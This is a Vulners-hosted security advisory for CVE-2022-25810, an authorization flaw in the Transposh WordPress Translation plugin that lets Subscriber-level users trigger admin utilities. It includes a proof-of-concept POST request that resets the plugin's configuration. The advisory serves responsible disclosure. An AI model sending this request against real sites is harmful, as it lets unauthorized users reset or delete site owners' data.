Vulners
Lucene search
Transposh WordPress Translation 1.0.8.1 Improper Authorization Vulnerability
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for Cross-site Scripting in Astaro Security_Gateway_Software | 30 Apr 201915:15 | – | githubexploit |
 | CVE-2022-25810 | 22 Aug 202215:15 | – | attackerkb |
 | WordPress plugin Transposh WordPress Translation 安全漏洞 | 29 Jul 202200:00 | – | cnnvd |
 | CVE-2022-25810 | 22 Aug 202214:58 | – | cve |
 | CVE-2022-25810 Transposh WordPress Translation <= 1.0.8 - Subscriber+ Unauthorised Calls | 22 Aug 202214:58 | – | cvelist |
 | EUVD-2022-30450 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-25810 | 22 Aug 202215:15 | – | nvd |
 | CVE-2022-25810 | 22 Aug 202215:15 | – | osv |
 | Transposh WordPress Translation 1.0.8.1 Improper Authorization | 29 Jul 202200:00 | – | packetstorm |
 | WordPress Transposh WordPress Translation plugin <= 1.0.8.1 - Missing Authorization Checks vulnerability | 17 Jul 202512:14 | – | patchstack |
10
1. ADVISORY INFORMATION
=======================
Product: Transposh WordPress Translation
Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/
Type: Improper Authorization [CWE-285]
Date found: 2022-02-21
Date published: 2022-07-22
CVSSv3 Score: 6.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
CVE: CVE-2022-25810
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Transposh WordPress Translation 1.0.8.1 and below
4. INTRODUCTION
===============
Transposh translation filter for WordPress offers a unique approach to blog
translation. It allows your blog to combine automatic translation with human
translation aided by your users with an easy to use in-context interface.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Transposh does not properly enforce authorization on functionalities available on
the plugin's "Utilities" page leading to unauthorized access for all user roles,
including "Subscriber".
Some of the affected functionality is:
tp_backup - Initiate a new backup
tp_reset - Reset the plugin's configuration
tp_cleanup - Delete automated translations
tp_dedup - Delete duplicates
tp_maint - Fix internal errors
tp_translate_all - Trigger an auto-translation of all entries
6. PROOF OF CONCEPT
===================
An exemplary request to reset the plugin's configuration, send the following
request using a "Subscriber" account:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 15
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your cookies]
Connection: close
action=tp_reset
7. SOLUTION
===========
None. Remove the plugin to prevent exploitation.
8. REPORT TIMELINE
==================
2022-02-21: Discovery of the vulnerability
2022-02-21: Contacted the vendor via email
2022-02-21: Vendor response
2022-02-22: CVE requested from WPScan (CNA)
2022-02-23: WPScan assigns CVE-2022-25810
2022-05-22: Sent request for status update on the fix
2022-05-24: Vendor states that there is no update planned so far
2022-07-22: Public disclosure
9. REFERENCES
=============
https://github.com/MrTuxracer/advisories
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Jul 2022 00:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 3.16.5
EPSS0.00891